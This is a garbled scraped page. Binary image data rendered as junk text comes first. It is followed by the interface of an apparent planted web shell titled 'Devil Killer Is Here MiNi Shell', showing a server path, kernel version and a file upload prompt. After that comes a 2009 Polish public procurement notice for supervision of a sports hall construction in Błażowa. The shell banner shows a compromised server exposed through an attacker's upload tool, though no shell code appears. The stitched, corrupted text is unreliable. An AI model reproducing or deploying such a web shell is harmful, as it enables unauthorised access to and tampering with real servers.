JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090923/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090923/162495-N-2009.html

<p class="kh_header"><b>Błażowa: Nadzór inwestorski nad projektem 
Budowa hali sportowej w Błażowej</b><br>
<b>Numer ogłoszenia: 162495 - 2009; data zamieszczenia: 23.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Gminy w Błażowej , Plac Wolności 1, 36-030 Błażowa, woj. podkarpackie, tel. 017/2297119, faks (017) 2297077.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.blazowa.itl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Nadzór inwestorski nad projektem 
Budowa hali sportowej w Błażowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie obejmuje kompleksową obsługę w zakresie pełnienia nadzoru inwestorskiego nad realizacją zadania współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Podkarpackiego 2007-2013, działanie 5.1.
 Budowa hali sportowej w Błażowej obejmująca niżej wskazany zakres rzeczowy:
1. Roboty wykończeniowe budowlane: budowa łącznika Hali sportowej z istniejącym budynkiem szkoły, budowa ścianek działowych, montaż stolarki i ślusarki, wykonanie podłoży i posadzek, wykonanie tynków i okładzin, wykonanie sufitów podwieszanych, wykonanie elewacji oraz wyposażenie w sprzęt sportowy.
2. Prace instalacyjne: wykonanie instalacji elektrycznej, instalacji wod.- kan. i c.w.u oraz kolektorów słonecznych, instalacji centralnego ogrzewania i wentylacji mechanicznej oraz budowę przyłączy kanalizacji sanitarnej i kanalizacji deszczowej, budowę oświetlenia terenu, wykonanie układu komunikacyjnego obejmującego budowę: boiska, dróg dojazdowych, dwóch zjazdów z drogi powiatowej, parkingów, chodników i podestu dla pompy.

Uwaga:  Do chwili obecnej został zrealizowany stan surowy otwarty hali.

Dokładny opis inwestycji wraz z projektami  budowlanymi i przedmiarami znajduje się na stronie internetowej Zamawiającego: www.blazowa.itl.pl bip w zakładce Ogłoszenia i przetargi Urzędu Miejskiego - przetargi - I przetarg nieograniczony na budowę II etapu hali sportowej w Błażowej.
Wartość zadań objętych nadzorem wynosi : 4 004 187,72 zł netto.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9, 71.24.70.00-1, 71.63.14.00-4, 71.52.10.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.07.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Każda oferta musi być zabezpieczona wadium w wysokości 1 000,00 zł (jeden tysiąc złotych).Wadium musi być wniesione przed upływem terminu do składania ofert.
Wadium może być wnoszone w następujących formach:
pieniądzu,
poręczeniach bankowych lub w poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręcznie kaszy jest zawsze poręczeniem pieniężnym
gwarancjach bankowych,
gwarancjach ubezpieczeniowych,
poręczeniach udzielanych przez podmioty, o których  mowa w art. 6 b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości 
(Dz. U. Nr 109 poz. 1158 z późn. zm.),
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego tj.: BS Błażowa 52 9158 0001 2001 0000 0257 0006.
Zamawiający zwróci niezwłocznie wadium jeżeli:
upłynął termin związania ofertą,
zawarto umowę i wniesiono zabezpieczenie należytego wykonania umowy,
Zamawiający unieważnił postępowanie o udzielenie zamówienia publicznego, a protesty zostały ostatecznie rozstrzygnięte lub upłyną termin do ich wnoszenia,
Wadium zostanie zwrócone na wniosek Wykonawcy, który:
wycofał ofertę przed upływem terminu składania ofert,
został wykluczony z postępowania,
jego oferta została odrzucona.
Zamawiający żąda ponownego wniesienia wadium przez Wykonawców, którym zwrócono wadium na podstawie pkt. 9.6.2. i 9.6.3.  specyfikacji jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia wykonawcy lub odrzucenia oferty. Wykonawcy wnoszą wadium w terminie określonym przez Zamawiającego.
Wadium wniesione w pieniądzu Zamawiający zwraca wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
Zamawiający zatrzymuje wadium wraz z odsetkami jeżeli Wykonawca, w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli  Wykonawca, którego oferta została wybrana:
odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
nie wniósł zabezpieczenia należytego wykonania umowy,
zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy
Jeżeli wadium zostanie wniesione w pieniądzu, przelewem, Wykonawca dołącza do oferty kserokopię wpłaty wadium z potwierdzeniem dokonanego przelewu. Na poleceniu przelewu należy wpisać: Wadium - Nadzór budowa hali . 
W przypadku wnoszenia wadium innych formach niż w pieniądzu, wymagane jest dołączenie do oferty dokumentu wystawionego na rzecz Zamawiającego. Dokumenty, o których mowa w punkach 9.3.2.-9.3.5.specyfikacji muszą zawierać określony datą termin odpowiedzialności, nie krótszy niż okres związania ofertą określony w specyfikacji istotnych warunków zamówienia oraz wszystkie przypadki utraty wadium przez Wykonawcę określone w art.46 ust. 4a i 5  ustawy Prawo zamówień publicznych
W przypadku wnoszenia wadium przelewem na rachunek bankowy, o jego wniesieniu w terminie decydować będzie data i godzina wpływu środków na rachunek bankowy Zamawiającego.Okoliczności i zasady zwrotu wadium, jego przepadku określa ustawa w art. 46. ustawy Prawo zamówień publicznych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się  Wykonawcy:
Spełniający warunki art. 22 ust. 1 ustawy Prawo Zamówień Publicznych z dnia 
29 stycznia 2004 (Dz. U. z 2007 r. Nr 223 poz. 1655 z późn. zm.) w tym posiadający uprawnienia do wykonywania określonej działalności będącej przedmiotem  zamówienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień
posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym   i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonywania zamówienia. 
Warunek ten zostanie spełniony przez Wykonawcę, jeżeli:
Wykonawca wykaże, że zrealizował w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie niniejszego zamówienia usługi, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców  oraz załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie, w szczególności minimum:
1zadanie polegające na świadczeniu usług nadzoru inwestorskiego nad realizacją robot budowlanych polegających na budowie lub rozbudowie lub przebudowie obiektów kubaturowych o powierzchni nie mniejszej niż 1000 m2. 
Zamawiający dopuszcza możliwość by Wykonawca wykazał się świadczeniem usług nadzoru nad zakresem robót wskazanym powyżej w ramach jednego zadania dysponują lub będą dysponować i wskażą do realizacji niniejszego zamówienia osoby zdolne do wykonania zamówienia legitymujące się kwalifikacjami odpowiednimi do stanowisk, jakie zostaną tym osobom powierzone. 
Warunek ten zostanie spełniony przez Wykonawcę, jeżeli:
Wykonawca przedstawi kandydata na stanowisko Inspektora nadzoru robót konstrukcyjno-budowlanych z uprawnieniami do kierowania  w specjalności konstrukcyjno-budowlanej bez ograniczeń (zgodnie ustawą z dnia 7 lipca 1994 r. Prawo Budowlane (Dz. U. 2006 Nr 156 poz. 1118 z późn. zm.) i Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28.04.2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. Nr 83 poz. 578) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów uprawniające do kierowania robotami budowlanymi w zakresie co najmniej specjalności konstrukcyjno-budowlanej. Osoba ta musi posiadać co najmniej 3 letnie doświadczenie zawodowe jako inspektora nadzoru i doświadczenie w nadzorowaniu nad co najmniej 1 zadaniem polegającym  na budowie lub rozbudowie lub przebudowie obiektów kubaturowych o powierzchni nie mniejszej niż 1000 m2
Wykonawca przedstawi kandydata na stanowisko Inspektora nadzoru robót sanitarnych z uprawnieniami do kierowania  w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wentylacyjnych, wodociągowych i kanalizacyjnych bez ograniczeń (zgodnie ustawą z dnia 7 lipca 1994 r. Prawo Budowlane (Dz. U. 2006 Nr 156 poz. 1118 z późn.zm.) i Rozporządzeniem Ministra Transportu    i Budownictwa z dnia 28.04.2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. Nr 83 poz. 578) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów uprawniające do kierowania robotami budowlanymi w zakresie co najmniej sieci, instalacji i urządzeń wentylacyjnych, wodociągowych         i kanalizacyjnych, oraz urządzeń ochrony środowiska przed zanieczyszczeniem wód i gleby bez ograniczeń. Osoba ta musi posiadać co najmniej 3 letnie doświadczenie zawodowe jako inspektora nadzoru.
Wykonawca przedstawi kandydata na stanowisko Inspektora nadzoru robót drogowych z uprawnieniami do kierowania  w specjalności drogowej bez ograniczeń (zgodnie ustawą z dnia 7 lipca 1994 r. Prawo Budowlane (Dz. U. 2006 Nr 156 poz. 1118 z późn. zm.) i Rozporządzeniem Ministra Transportu                             i Budownictwa z dnia 28.04.2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. Nr 83 poz. 578) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów uprawniające do kierowania robotami budowlanymi w zakresie co najmniej dróg bez ograniczeń. Osoba ta musi posiadać co najmniej 3 letnie doświadczenie zawodowe jako inspektora nadzoru.
Wykonawca przedstawi kandydata na stanowisko Inspektora nadzoru robót elektrycznych  z uprawnieniami do kierowania  w specjalności sieci, instalacji, urządzeń elektrycznych i elektroenergetycznych (zgodnie ustawą z dnia 7 lipca 1994 r. Prawo Budowlane (Dz. U. 2006 Nr 156 poz. 1118 z późn.zm.)                                 i Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28.04.2006 r.                        w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. Nr 83 poz. 578 lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów uprawniające do kierowania robotami budowlanymi w zakresie co najmniej sieci, instalacji u urządzeń elektrycznych i elektroenergetycznych bez ograniczeń. Osoba ta musi posiadać co najmniej 3 letnie doświadczenie zawodowe jako inspektor nadzoru.
Inspektorzy nadzoru (osoby, o których mowa powyżej) muszą posiadać ważne uprawnienia budowlane wydane na podstawie obowiązujących przepisów - wystarczające co do zakresu rzeczowego przedmiotowego postępowania. Osoby te muszą być również członkami właściwej izby samorządu zawodowego inżynierów budownictwa, co należy potwierdzić zaświadczeniem wydanym przez tę izbę z określonym na niej terminem ważności. 
Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia:
Nie podlegający wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Prawo Zamówień Publicznych z dnia 29 stycznia 2004 (Dz. U. z 2007 r. Nr 223 poz. 1655 z późn. zm.)
Z postępowania o udzielenie zamówienia wyklucza się:
1wykonawców, którzy wyrządzili szkodę, nie wykonując zamówienia lub wykonując je nienależycie, jeżeli szkoda ta została stwierdzona prawomocnym orzeczeniem sądu wydanym w okresie 3 lat przed wszczęciem postępowania;
2.wykonawców, w stosunku do których otwarto likwidację lub których upadłość ogłoszono,                          z wyjątkiem wykonawców, którzy po ogłoszeniu upadłości zawarli układ zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli poprzez likwidację majątku upadłego;
3.wykonawców, którzy zalegają z uiszczeniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne, z wyjątkiem przypadków gdy uzyskali oni przewidziane prawem zwolnienie, odroczenie, rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 
4.osoby fizyczne, które prawomocnie skazano za przestępstwo popełnione w związku                                   z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
5.	 spółki jawne, których wspólnika prawomocnie skazano za przestępstwo popełnione w związku                  z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
6.	 spółki partnerskie, których partnera lub członka zarządu prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych,                         a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
7.	spółki komandytowe oraz spółki komandytowo-akcyjne, których komplementariusza prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału               w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
8.	osoby prawne, których urzędującego członka organu zarządzającego prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
9.	podmioty zbiorowe, wobec których sąd orzekł zakaz ubiegania się o zamówienia, na podstawie przepisów o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary;
10.	wykonawców, którzy nie spełniają warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt. 1-3 ustawy pzp.
Z postępowania wyklucza się również Wykonawców, którzy:
11.	wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności, chyba że udział tych wykonawców w postępowaniu nie utrudni uczciwej konkurencji; przepisu nie stosuje się do wykonawców, którym udziela się zamówienia na podstawie art. 62 ust. 1 pkt. 2 lub art. 67 ust. 1 pkt. 1 i 2;
12.	 złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania;
13.	 nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy,                                  z zastrzeżeniem art. 26 ust. 3 ustawy pzp;
14.	 nie wnieśli wadium, w tym również na przedłużony okres związania ofertą, lub nie zgodzili się na przedłużenie okresu związania ofertą.
1.1.	W przypadku składania oferty wspólnej Wykonawcy muszą wykazać, że:
1.1.1.	Warunek określony w punkcie 5.1.1 i  5.1.5. spełnia  każdy z Wykonawców
1.1.2.	Warunek określony w punkcie 5.1.3; 5.1.4;  spełniają łącznie wszyscy Wykonawcy.
1.1.3.	Warunek określony w punkcie 5.1.2.2. spełnia co najmniej jeden z Wykonawców występujących wspólnie.
1.1.4.	Warunek określony w punkcie 5.1.2.3 spełnia co najmniej jeden z Wykonawców występujących wspólnie.
1.1.5.	Warunek określony w punkcie 5.1.2.4 spełnia co najmniej jeden z Wykonawców występujących wspólnie
5.2.	Ocena spełniania warunków zostanie dokonana na podstawie załączonych do oferty przez Wykonawcę dokumentów określonych przez Zamawiającego w S.I.W.Z. Ocena będzie dokonana metodą  wyboru spełnia nie spełnia, na podstawie dostarczonych dokumentów i oświadczeń..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełnienia warunków udziału w postępowaniu Wykonawcy składają                   w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem prze Wykonawcę następujące dokumenty;

6.1.	W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustaw z dnia 29 stycznia 2004 r. (Dz. U. z 2007 r. Nr 223 poz. 1655 z późn. zm.) Zamawiający żąda następujące dokumentów:
6.1.1.	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy  przed upływem terminu składania ofert;
Uwaga: W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia do oferty należy dołączyć dokumenty wymagane w pkt. 6.1 SIWZ dotyczące wszystkich wykonawców ubiegających się o udzielenie zamówienia.

Uwaga: Jeżeli ofertę i załączone do niej dokumenty podpisują osoby nieujawnione w rejestrze lub ewidencji, do oferty należy dołączyć stosowne pełnomocnictwa udzielone przez osobęosoby ujawnioną  w rejestrze lub ewidencji. Pełnomocnictwo winno spełniać wymogi określone w art. 61 oraz 98 i następnych Kodeksu Cywilnego (Dz. U. 1964 nr 16 poz. 93 z późn. zm.)

6.2.	W celu potwierdzenia warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonywania zamówienia, Zamawiający żąda następujących dokumentów:
6.3.	Wykazu wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie - odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia                        z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców w szczególności potwierdzającego wykonanie w tym okresie co najmniej 1 zadania polegającego na świadczeniu usług nadzoru inwestorskiego nad realizacją robót budowlanych polegających na: budowie obiektów kubaturowych o powierzchni nie mniejszej niż 1000 m2. Zamawiający dopuszcza możliwość by Wykonawca wykazał się świadczeniem usług nadzoru nad zakresem robót wskazanym powyżej w ramach jednego zadania.  Do wykazu należy dołączyć dokumenty potwierdzające że usługi te zostały wykonane należycie. 
6.3.1.	Wykazu osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności. Z wykazu powinny wynikać informacje o:
6.3.1.1.	Inspektorze nadzoru robót konstrukcyjno-budowlanych przewidzianym do realizacji zadania. Do informacji należy dołączyć następujące dokumenty dotyczące inspektora przewidzianego do realizacji zadania:
6.3.1.1.1.	dokument potwierdzający posiadanie uprawnień do wykonywania samodzielnych funkcji w budownictwie w specjalności konstrukcyjno-budowlanej  bez ograniczeń; (zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo Budowlane (Dz. U. 2006 Nr 156 poz. 1118 z późniejszymi zmianami). 
6.3.1.1.2.	dokument potwierdzający aktualne członkostwo w Polskiej Izbie Inżynierów Budownictwa
6.3.1.1.3.	życiorys zawodowy potwierdzający co najmniej 3 letni staż w nadzorowaniu oraz doświadczenie w nadzorowaniu nad: co najmniej 1 zadaniem polegającym  na: budowie obiektów kubaturowych o powierzchni co najmniej 1000 m2.
6.3.1.2.	Inspektorze  nadzoru  robót sanitarnych  przewidzianym do realizacji zadania. Do informacji należy dołączyć następujące dokumenty dotyczące inspektora przewidzianego do realizacji zadania: 
6.3.1.2.1.	dokument potwierdzający posiadanie uprawnień do wykonywania samodzielnych funkcji w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wentylacyjnych, wodociągowych i kanalizacyjnych  bez ograniczeń; (zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo Budowlane (Dz. U. 2006 Nr 156 poz. 1118 z późniejszymi zmianami). 
6.3.1.2.2.	dokument potwierdzający aktualne członkostwo w Polskiej Izbie Inżynierów Budownictwa
6.3.1.2.3.	życiorys zawodowy potwierdzający co najmniej 3 letni staż w nadzorowaniu. 
6.3.1.3.	Inspektorze nadzoru  robót  elektrycznych   przewidzianym do realizacji zadania. Do informacji należy dołączyć następujące dokumenty dotyczące inspektora  przewidzianego do realizacji zadania: 
6.3.1.3.1.	dokument potwierdzający posiadanie uprawnień do wykonywania samodzielnych funkcji w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji u urządzeń elektrycznych i elektroenergetycznych bez ograniczeń (zgodnie z  ustawą z dnia 7 lipca 1994 r. Prawo Budowlane (Dz. U. 2006 Nr 156 poz. 1118 z późniejszymi zmianami), oraz uprawnienia SEP.). 
6.3.1.3.2.	dokument potwierdzający aktualne członkostwo w Polskiej Izbie Inżynierów Budownictwa
6.3.1.3.3.	życiorys zawodowy potwierdzający co najmniej 3 letni staż w nadzorowaniu.
6.3.1.4.	Inspektorze nadzoru  robót  drogowych przewidzianym do realizacji zadania. Do informacji należy dołączyć następujące dokumenty dotyczące inspektora  przewidzianego do realizacji zadania:
6.3.1.4.1.	dokument potwierdzający posiadanie uprawnień do wykonywania samodzielnych funkcji w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wentylacyjnych, wodociągowych i kanalizacyjnych  bez ograniczeń; (zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo Budowlane (Dz. U. 2006 Nr 156 poz. 1118 z późniejszymi zmianami). 
